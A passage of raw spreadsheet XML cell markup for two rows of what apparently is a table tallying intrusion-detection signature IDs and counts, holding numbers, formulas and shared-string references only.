      <c r="CX24" s="105">
        <v>0.0</v>
      </c>
      <c r="CY24" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ24" s="105">
        <v>0.0</v>
      </c>
      <c r="DA24" s="105">
        <v>0.0</v>
      </c>
      <c r="DB24" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC24" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD24" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE24" s="106">
        <f t="shared" si="18"/>
        <v>0</v>
      </c>
      <c r="DF24" s="106">
        <f t="shared" si="19"/>
        <v>0</v>
      </c>
      <c r="DG24" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH24" s="106">
        <f t="shared" si="21"/>
        <v>0</v>
      </c>
      <c r="DI24" s="106">
        <f t="shared" si="22"/>
        <v>0</v>
      </c>
      <c r="DJ24" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK24" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL24" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DN24" s="108">
        <v>0.0</v>
      </c>
      <c r="DO24" s="108">
        <v>0.0</v>
      </c>
      <c r="DP24" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DR24" s="108">
        <v>0.0</v>
      </c>
      <c r="DS24" s="108">
        <v>0.0</v>
      </c>
      <c r="DT24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DU24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DW24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DY24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ24" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA24" s="108">
        <v>0.0</v>
      </c>
      <c r="EB24" s="108">
        <v>0.0</v>
      </c>
      <c r="EC24" s="109">
        <v>9.0</v>
      </c>
      <c r="ED24" s="109">
        <v>0.0</v>
      </c>
      <c r="EE24" s="109">
        <v>0.0</v>
      </c>
      <c r="EF24" s="109">
        <v>0.0</v>
      </c>
      <c r="EG24" s="109">
        <v>0.0</v>
      </c>
      <c r="EH24" s="109">
        <v>0.0</v>
      </c>
      <c r="EI24" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ24" s="109">
        <v>0.0</v>
      </c>
      <c r="EK24" s="109">
        <v>0.0</v>
      </c>
      <c r="EL24" s="109">
        <v>0.0</v>
      </c>
      <c r="EM24" s="109">
        <v>0.0</v>
      </c>
      <c r="EN24" s="109">
        <v>0.0</v>
      </c>
      <c r="EO24" s="109">
        <v>0.0</v>
      </c>
      <c r="EP24" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ24" s="109">
        <v>0.0</v>
      </c>
      <c r="ER24" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES24" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET24" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU24" s="110">
        <f t="shared" si="30"/>
        <v>0</v>
      </c>
      <c r="EV24" s="110">
        <f t="shared" si="31"/>
        <v>0</v>
      </c>
      <c r="EW24" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX24" s="110">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="EY24" s="110">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="EZ24" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA24" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB24" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC24" s="111" t="s">
        <v>598</v>
      </c>
      <c r="FD24" s="111">
        <v>6.0</v>
      </c>
      <c r="FE24" s="111">
        <v>15.0</v>
      </c>
      <c r="FF24" s="101" t="s">
        <v>599</v>
      </c>
      <c r="FG24" s="111" t="s">
        <v>600</v>
      </c>
      <c r="FH24" s="111">
        <v>3.0</v>
      </c>
      <c r="FI24" s="111">
        <v>3.0</v>
      </c>
      <c r="FJ24" s="111" t="s">
        <v>601</v>
      </c>
      <c r="FK24" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FL24" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749, 2100472, 2003303, 2003410, 2015016,</v>
      </c>
      <c r="FM24" s="111" t="s">
        <v>602</v>
      </c>
      <c r="FN24" s="111" t="s">
        <v>599</v>
      </c>
      <c r="FO24" s="111">
        <v>2015016.0</v>
      </c>
      <c r="FP24" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ24" s="111">
        <v>1.0</v>
      </c>
      <c r="FR24" s="111">
        <v>1.0</v>
      </c>
      <c r="FS24" s="112">
        <v>8.0</v>
      </c>
      <c r="FT24" s="112">
        <v>4.0</v>
      </c>
      <c r="FU24" s="112">
        <v>11.0</v>
      </c>
      <c r="FV24" s="112">
        <v>0.0</v>
      </c>
      <c r="FW24" s="112">
        <v>15.0</v>
      </c>
      <c r="FX24" s="112">
        <v>15.0</v>
      </c>
      <c r="FY24" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ24" s="112">
        <v>0.0</v>
      </c>
      <c r="GA24" s="112">
        <v>1.0</v>
      </c>
      <c r="GB24" s="112">
        <v>1.0</v>
      </c>
      <c r="GC24" s="112">
        <v>1.0</v>
      </c>
      <c r="GD24" s="112">
        <v>3.0</v>
      </c>
      <c r="GE24" s="112">
        <v>0.0</v>
      </c>
      <c r="GF24" s="112">
        <v>3.0</v>
      </c>
      <c r="GG24" s="112">
        <v>3.0</v>
      </c>
      <c r="GH24" s="113">
        <f t="shared" si="39"/>
        <v>4</v>
      </c>
      <c r="GI24" s="113">
        <f t="shared" si="40"/>
        <v>1</v>
      </c>
      <c r="GJ24" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK24" s="113">
        <f t="shared" si="42"/>
        <v>11</v>
      </c>
      <c r="GL24" s="113">
        <f t="shared" si="43"/>
        <v>3</v>
      </c>
      <c r="GM24" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN24" s="113">
        <f t="shared" si="45"/>
        <v>15</v>
      </c>
      <c r="GO24" s="113">
        <f t="shared" si="46"/>
        <v>3</v>
      </c>
      <c r="GP24" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ24" s="114">
        <f t="shared" si="81"/>
        <v>1</v>
      </c>
      <c r="GR24" s="113">
        <f t="shared" si="82"/>
        <v>1</v>
      </c>
      <c r="GS24" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT24" s="94" t="s">
        <v>603</v>
      </c>
      <c r="GU24" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV24" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW24" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF24" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG24" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH24" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI24" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ24" s="93" t="s">
        <v>604</v>
      </c>
      <c r="HK24" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL24" s="93">
        <v>8.0</v>
      </c>
      <c r="HM24" s="93">
        <f t="shared" si="83"/>
        <v>0</v>
      </c>
      <c r="HN24" s="93">
        <v>0.0</v>
      </c>
      <c r="HO24" s="93">
        <v>0.0</v>
      </c>
      <c r="HP24" s="93">
        <v>0.0</v>
      </c>
      <c r="HQ24" s="118">
        <f t="shared" si="53"/>
        <v>0</v>
      </c>
      <c r="HR24" s="118">
        <f t="shared" si="54"/>
        <v>0</v>
      </c>
      <c r="HS24" s="118">
        <f t="shared" si="55"/>
        <v>0</v>
      </c>
      <c r="HT24" s="139" t="s">
        <v>443</v>
      </c>
      <c r="HU24" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV24" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW24" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX24" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC24" s="120" t="str">
        <f t="shared" ref="IC24:IC25" si="84">HV24</f>
        <v>-</v>
      </c>
      <c r="ID24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH24" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II24" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ24" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK24" s="99">
        <v>8.0</v>
      </c>
      <c r="IL24" s="99">
        <v>0.0</v>
      </c>
      <c r="IM24" s="121">
        <f t="shared" si="57"/>
        <v>1</v>
      </c>
      <c r="IN24" s="122" t="s">
        <v>444</v>
      </c>
      <c r="IO24" s="98">
        <v>1.0</v>
      </c>
      <c r="IP24" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ24" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR24" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS24" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT24" s="127"/>
      <c r="IU24" s="127"/>
      <c r="IV24" s="127"/>
      <c r="IW24" s="127"/>
      <c r="IX24" s="127"/>
      <c r="IY24" s="127"/>
      <c r="IZ24" s="127"/>
      <c r="JA24" s="127"/>
      <c r="JB24" s="127"/>
      <c r="JC24" s="127"/>
      <c r="JD24" s="127"/>
      <c r="JE24" s="127"/>
      <c r="JF24" s="127"/>
      <c r="JG24" s="127"/>
      <c r="JH24" s="127"/>
      <c r="JI24" s="127"/>
      <c r="JJ24" s="127"/>
      <c r="JK24" s="127"/>
      <c r="JL24" s="127"/>
      <c r="JM24" s="127"/>
      <c r="JN24" s="127"/>
      <c r="JO24" s="127"/>
      <c r="JP24" s="127"/>
      <c r="JQ24" s="127"/>
      <c r="JR24" s="127"/>
      <c r="JS24" s="127"/>
      <c r="JT24" s="127"/>
      <c r="JU24" s="127"/>
      <c r="JV24" s="127"/>
      <c r="JW24" s="127"/>
      <c r="JX24" s="127"/>
      <c r="JY24" s="127"/>
      <c r="JZ24" s="127"/>
      <c r="KA24" s="127"/>
      <c r="KB24" s="127"/>
      <c r="KC24" s="127"/>
      <c r="KD24" s="127"/>
      <c r="KE24" s="127"/>
      <c r="KF24" s="127"/>
      <c r="KG24" s="127"/>
      <c r="KH24" s="127"/>
      <c r="KI24" s="127"/>
      <c r="KJ24" s="127"/>
      <c r="KK24" s="127"/>
      <c r="KL24" s="127"/>
      <c r="KM24" s="127"/>
      <c r="KN24" s="127"/>
      <c r="KO24" s="127"/>
      <c r="KP24" s="127"/>
      <c r="KQ24" s="127"/>
      <c r="KR24" s="127"/>
      <c r="KS24" s="127"/>
      <c r="KT24" s="127"/>
      <c r="KU24" s="127"/>
      <c r="KV24" s="127"/>
      <c r="KW24" s="127"/>
      <c r="KX24" s="127"/>
      <c r="KY24" s="127"/>
      <c r="KZ24" s="127"/>
      <c r="LA24" s="127"/>
      <c r="LB24" s="127"/>
      <c r="LC24" s="127"/>
      <c r="LD24" s="127"/>
      <c r="LE24" s="127"/>
      <c r="LF24" s="127"/>
      <c r="LG24" s="127"/>
      <c r="LH24" s="127"/>
      <c r="LI24" s="127"/>
      <c r="LJ24" s="127"/>
      <c r="LK24" s="127"/>
      <c r="LL24" s="127"/>
      <c r="LM24" s="127"/>
      <c r="LN24" s="127"/>
      <c r="LO24" s="127"/>
      <c r="LP24" s="127"/>
      <c r="LQ24" s="127"/>
      <c r="LR24" s="127"/>
      <c r="LS24" s="127"/>
      <c r="LT24" s="127"/>
      <c r="LU24" s="127"/>
      <c r="LV24" s="127"/>
      <c r="LW24" s="127"/>
      <c r="LX24" s="127"/>
      <c r="LY24" s="127"/>
      <c r="LZ24" s="127"/>
      <c r="MA24" s="127"/>
      <c r="MB24" s="127"/>
      <c r="MC24" s="127"/>
      <c r="MD24" s="127"/>
      <c r="ME24" s="127"/>
      <c r="MF24" s="127"/>
      <c r="MG24" s="127"/>
      <c r="MH24" s="127"/>
      <c r="MI24" s="127"/>
      <c r="MJ24" s="127"/>
      <c r="MK24" s="127"/>
      <c r="ML24" s="127"/>
      <c r="MM24" s="127"/>
      <c r="MN24" s="127"/>
      <c r="MO24" s="127"/>
      <c r="MP24" s="127"/>
      <c r="MQ24" s="127"/>
      <c r="MR24" s="127"/>
      <c r="MS24" s="127"/>
      <c r="MT24" s="127"/>
      <c r="MU24" s="127"/>
      <c r="MV24" s="127"/>
      <c r="MW24" s="127"/>
      <c r="MX24" s="127"/>
      <c r="MY24" s="127"/>
      <c r="MZ24" s="127"/>
      <c r="NA24" s="127"/>
      <c r="NB24" s="127"/>
      <c r="NC24" s="127"/>
      <c r="ND24" s="127"/>
      <c r="NE24" s="127"/>
      <c r="NF24" s="127"/>
      <c r="NG24" s="127"/>
      <c r="NH24" s="127"/>
      <c r="NI24" s="127"/>
      <c r="NJ24" s="127"/>
      <c r="NK24" s="127"/>
      <c r="NL24" s="127"/>
      <c r="NM24" s="127"/>
      <c r="NN24" s="127"/>
      <c r="NO24" s="127"/>
      <c r="NP24" s="127"/>
      <c r="NQ24" s="127"/>
      <c r="NR24" s="127"/>
      <c r="NS24" s="127"/>
      <c r="NT24" s="127"/>
      <c r="NU24" s="127"/>
      <c r="NV24" s="127"/>
      <c r="NW24" s="127"/>
      <c r="NX24" s="127"/>
      <c r="NY24" s="127"/>
    </row>
    <row r="25" ht="208.5" customHeight="1">
      <c r="B25" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C25" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D25" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E25" s="90" t="s">
        <v>586</v>
      </c>
      <c r="F25" s="90" t="s">
        <v>587</v>
      </c>
      <c r="G25" s="91" t="s">
        <v>588</v>
      </c>
      <c r="H25" s="90" t="s">
        <v>589</v>
      </c>
      <c r="I25" s="92" t="s">
        <v>605</v>
      </c>
      <c r="J25" s="92" t="s">
        <v>606</v>
      </c>
      <c r="K25" s="92" t="s">
        <v>607</v>
      </c>
      <c r="L25" s="93" t="s">
        <v>608</v>
      </c>
      <c r="M25" s="93">
        <v>1.0</v>
      </c>
      <c r="N25" s="93">
        <v>1.0</v>
      </c>
      <c r="O25" s="93">
        <v>0.0</v>
      </c>
      <c r="P25" s="93">
        <v>1.0</v>
      </c>
      <c r="Q25" s="93">
        <f t="shared" si="70"/>
        <v>16</v>
      </c>
      <c r="R25" s="93">
        <v>16.0</v>
      </c>
      <c r="S25" s="93">
        <v>0.0</v>
      </c>
      <c r="T25" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U25" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V25" s="96" t="s">
        <v>609</v>
      </c>
      <c r="W25" s="96" t="s">
        <v>610</v>
      </c>
      <c r="X25" s="97" t="s">
        <v>611</v>
      </c>
      <c r="Y25" s="96" t="s">
        <v>612</v>
      </c>
      <c r="Z25" s="97" t="s">
        <v>613</v>
      </c>
      <c r="AA25" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB25" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC25" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD25" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE25" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF25" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG25" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH25" s="99" t="s">
        <v>614</v>
      </c>
      <c r="AI25" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ25" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK25" s="100" t="s">
        <v>615</v>
      </c>
      <c r="AL25" s="100">
        <v>3.0</v>
      </c>
      <c r="AM25" s="100">
        <v>48.0</v>
      </c>
      <c r="AN25" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO25" s="100" t="s">
        <v>616</v>
      </c>
      <c r="AP25" s="100">
        <v>3.0</v>
      </c>
      <c r="AQ25" s="100">
        <v>48.0</v>
      </c>
      <c r="AR25" s="100" t="s">
        <v>617</v>
      </c>
      <c r="AS25" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT25" s="100" t="str">
        <f t="shared" si="74"/>
        <v>29456, 384, 408</v>
      </c>
      <c r="AU25" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV25" s="100" t="s">
        <v>618</v>
      </c>
      <c r="AW25" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX25" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY25" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ25" s="100">
        <v>0.0</v>
      </c>
      <c r="BA25" s="102">
        <v>1.0</v>
      </c>
      <c r="BB25" s="102">
        <v>0.0</v>
      </c>
      <c r="BC25" s="102">
        <v>32.0</v>
      </c>
      <c r="BD25" s="102">
        <v>48.0</v>
      </c>
      <c r="BE25" s="102">
        <v>0.0</v>
      </c>
      <c r="BF25" s="102">
        <v>0.0</v>
      </c>
      <c r="BG25" s="102">
        <v>0.0</v>
      </c>
      <c r="BH25" s="102">
        <v>0.0</v>
      </c>
      <c r="BI25" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ25" s="102">
        <v>32.0</v>
      </c>
      <c r="BK25" s="102">
        <v>48.0</v>
      </c>
      <c r="BL25" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM25" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN25" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO25" s="103">
        <f t="shared" si="6"/>
        <v>32</v>
      </c>
      <c r="BP25" s="103">
        <f t="shared" si="7"/>
        <v>32</v>
      </c>
      <c r="BQ25" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR25" s="103">
        <f t="shared" si="9"/>
        <v>3</v>
      </c>
      <c r="BS25" s="103">
        <f t="shared" si="10"/>
        <v>3</v>
      </c>
      <c r="BT25" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU25" s="103">
        <f t="shared" si="75"/>
        <v>0</v>
      </c>
      <c r="BV25" s="103">
        <f t="shared" si="76"/>
        <v>0</v>
      </c>
      <c r="BW25" s="104" t="s">
        <v>615</v>
      </c>
      <c r="BX25" s="104">
        <v>3.0</v>
      </c>
      <c r="BY25" s="104">
        <v>48.0</v>
      </c>
      <c r="BZ25" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA25" s="104" t="s">
        <v>619</v>
      </c>
      <c r="CB25" s="104">
        <v>3.0</v>
      </c>
      <c r="CC25" s="104">
        <v>48.0</v>
      </c>
      <c r="CD25" s="104" t="s">
        <v>620</v>
      </c>
      <c r="CE25" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF25" s="104" t="str">
        <f t="shared" si="73"/>
        <v>29456, 384, 408</v>
      </c>
      <c r="CG25" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH25" s="104" t="s">
        <v>621</v>
      </c>
      <c r="CI25" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ25" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK25" s="104">
        <v>0.0</v>
      </c>
      <c r="CL25" s="104">
        <v>0.0</v>
      </c>
      <c r="CM25" s="105">
        <v>0.0</v>
      </c>
      <c r="CN25" s="105">
        <v>0.0</v>
      </c>
      <c r="CO25" s="105">
        <v>32.0</v>
      </c>
      <c r="CP25" s="105">
        <v>48.0</v>
      </c>
      <c r="CQ25" s="105">
        <v>0.0</v>
      </c>
      <c r="CR25" s="105">
        <v>48.0</v>
      </c>
      <c r="CS25" s="105">
        <v>0.0</v>
      </c>
      <c r="CT25" s="105">
        <v>0.0</v>
      </c>
      <c r="CU25" s="105">
        <v>0.0</v>
      </c>
      <c r="CV25" s="105">
        <v>0.0</v>
      </c>
      <c r="CW25" s="105">
        <v>0.0</v>
      </c>
      <c r="CX25" s="105">
        <v>32.0</v>
      </c>
      <c r="CY25" s="105">
        <v>48.0</v>
      </c>
      <c r="CZ25" s="105">
        <v>0.0</v>
      </c>
      <c r="DA25" s="105">
        <v>48.0</v>
      </c>
      <c r="DB25" s="106">
        <f t="shared" si="15"/>
        <v>0</v>
      </c>
      <c r="DC25" s="106">
        <f t="shared" si="16"/>
        <v>0</v>
      </c>
      <c r="DD25" s="106">
        <f t="shared" si="17"/>
        <v>0</v>
      </c>
      <c r="DE25" s="106">
        <f t="shared" si="18"/>
        <v>32</v>
      </c>
      <c r="DF25" s="106">
        <f t="shared" si="19"/>
        <v>32</v>
      </c>
      <c r="DG25" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH25" s="106">
        <f t="shared" si="21"/>
        <v>3</v>
      </c>
      <c r="DI25" s="106">
        <f t="shared" si="22"/>
        <v>3</v>
      </c>
      <c r="DJ25" s="106">
        <f t="shared" si="23"/>
        <v>0</v>
      </c>
      <c r="DK25" s="107">
        <f t="shared" si="77"/>
        <v>0</v>
      </c>
      <c r="DL25" s="106">
        <f t="shared" si="78"/>
        <v>0</v>
      </c>
      <c r="DM25" s="108" t="s">
        <v>622</v>
      </c>
      <c r="DN25" s="108">
        <v>4.0</v>
      </c>
      <c r="DO25" s="108">
        <v>112.0</v>
      </c>
      <c r="DP25" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ25" s="108" t="s">
        <v>623</v>
      </c>
      <c r="DR25" s="108">
        <v>4.0</v>
      </c>
      <c r="DS25" s="108">
        <v>112.0</v>
      </c>
      <c r="DT25" s="108" t="s">
        <v>624</v>
      </c>
      <c r="DU25" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV25" s="108" t="str">
        <f t="shared" ref="DV25:DV34" si="85">IF(DT25="-",DU25,DT25)</f>
        <v>31767, 29456, 384, 408</v>
      </c>
      <c r="DW25" s="108">
        <v>31767.0</v>
      </c>
      <c r="DX25" s="108" t="s">
        <v>625</v>
      </c>
      <c r="DY25" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ25" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA25" s="108">
        <v>0.0</v>
      </c>
      <c r="EB25" s="108">
        <v>0.0</v>
      </c>
      <c r="EC25" s="109">
        <v>1.0</v>
      </c>
      <c r="ED25" s="109">
        <v>0.0</v>
      </c>
      <c r="EE25" s="109">
        <v>32.0</v>
      </c>
      <c r="EF25" s="109">
        <v>64.0</v>
      </c>
      <c r="EG25" s="109">
        <v>0.0</v>
      </c>
      <c r="EH25" s="109">
        <v>64.0</v>
      </c>
      <c r="EI25" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ25" s="109">
        <v>0.0</v>
      </c>
      <c r="EK25" s="109">
        <v>0.0</v>
      </c>
      <c r="EL25" s="109">
        <v>0.0</v>
      </c>
      <c r="EM25" s="109">
        <v>0.0</v>
      </c>
      <c r="EN25" s="109">
        <v>32.0</v>
      </c>
      <c r="EO25" s="109">
        <v>64.0</v>
      </c>
      <c r="EP25" s="109">
        <v>0.0</v>
      </c>
      <c r="EQ25" s="109">
        <v>64.0</v>
      </c>
      <c r="ER25" s="110">
        <f t="shared" si="27"/>
        <v>0</v>
      </c>
      <c r="ES25" s="110">
        <f t="shared" si="28"/>
        <v>0</v>
      </c>
      <c r="ET25" s="110">
        <f t="shared" si="29"/>
        <v>0</v>
      </c>
      <c r="EU25" s="110">
        <f t="shared" si="30"/>
        <v>32</v>
      </c>
      <c r="EV25" s="110">
        <f t="shared" si="31"/>
        <v>32</v>
      </c>
      <c r="EW25" s="110">
        <f t="shared" si="32"/>
        <v>0</v>
      </c>
      <c r="EX25" s="110">
        <f t="shared" si="33"/>
        <v>4</v>
      </c>
      <c r="EY25" s="110">
        <f t="shared" si="34"/>
        <v>4</v>
      </c>
      <c r="EZ25" s="110">
        <f t="shared" si="35"/>
        <v>0</v>
      </c>
      <c r="FA25" s="110">
        <f t="shared" si="79"/>
        <v>0</v>
      </c>
      <c r="FB25" s="110">
        <f t="shared" si="80"/>
        <v>0</v>
      </c>
      <c r="FC25" s="111" t="s">
        <v>626</v>
      </c>
      <c r="FD25" s="111">
        <v>8.0</v>
      </c>
      <c r="FE25" s="111">
        <v>100.0</v>
      </c>
      <c r="FF25" s="101" t="s">
        <v>627</v>
      </c>
      <c r="FG25" s="111" t="s">
        <v>628</v>
      </c>
      <c r="FH25" s="111">
        <v>4.0</v>
      </c>
      <c r="FI25" s="111">
        <v>64.0</v>
      </c>
      <c r="FJ25" s="111" t="s">
        <v>629</v>
      </c>
      <c r="FK25" s="111" t="s">
        <v>627</v>
      </c>
      <c r="FL25" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2100384, 2002752, 2002749, 2100408, 29456, 384, 408, 31767</v>
      </c>
      <c r="FM25" s="111">
        <v>31767.0</v>
      </c>
      <c r="FN25" s="111" t="s">
        <v>630</v>
      </c>
      <c r="FO25" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP25" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ25" s="111">
        <v>0.0</v>
      </c>
      <c r="FR25" s="111">
        <v>0.0</v>
      </c>
      <c r="FS25" s="112">
        <v>0.0</v>
      </c>
      <c r="FT25" s="112">
        <v>0.0</v>
      </c>
      <c r="FU25" s="112">
        <v>32.0</v>
      </c>
      <c r="FV25" s="112">
        <v>64.0</v>
      </c>
      <c r="FW25" s="112">
        <v>36.0</v>
      </c>
      <c r="FX25" s="112">
        <v>64.0</v>
      </c>
      <c r="FY25" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ25" s="112">
        <v>0.0</v>
      </c>
      <c r="GA25" s="112">
        <v>0.0</v>
      </c>
      <c r="GB25" s="112">
        <v>0.0</v>
      </c>
      <c r="GC25" s="112">
        <v>0.0</v>
      </c>
      <c r="GD25" s="112">
        <v>32.0</v>
      </c>
      <c r="GE25" s="112">
        <v>64.0</v>
      </c>
      <c r="GF25" s="112">
        <v>0.0</v>
      </c>
      <c r="GG25" s="112">
        <v>64.0</v>
      </c>
      <c r="GH25" s="113">
        <f t="shared" si="39"/>
        <v>0</v>
      </c>
      <c r="GI25" s="113">
        <f t="shared" si="40"/>
        <v>0</v>
      </c>
      <c r="GJ25" s="113">
        <f t="shared" si="41"/>
        <v>0</v>
      </c>
      <c r="GK25" s="113">
        <f t="shared" si="42"/>
        <v>32</v>
      </c>
      <c r="GL25" s="113">
        <f t="shared" si="43"/>
        <v>32</v>
      </c>
      <c r="GM25" s="113">
        <f t="shared" si="44"/>
        <v>0</v>
      </c>
      <c r="GN25" s="113">
        <f t="shared" si="45"/>
        <v>4</v>
      </c>
      <c r="GO25" s="113">
        <f t="shared" si="46"/>
        <v>4</v>
      </c>
      <c r="GP25" s="113">
        <f t="shared" si="47"/>
        <v>0</v>
      </c>
      <c r="GQ25" s="114">
        <f t="shared" si="81"/>
        <v>0</v>
      </c>
      <c r="GR25" s="113">
        <f t="shared" si="82"/>
        <v>0</v>
      </c>
      <c r="GS25" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT25" s="94" t="s">
        <v>631</v>
      </c>
      <c r="GU25" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV25" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW25" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF25" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG25" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH25" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI25" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ25" s="93" t="s">
        <v>12</v>
      </c>
